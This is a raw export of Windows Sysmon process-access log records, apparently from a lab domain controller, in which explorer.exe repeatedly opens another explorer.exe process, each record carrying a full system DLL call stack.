16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 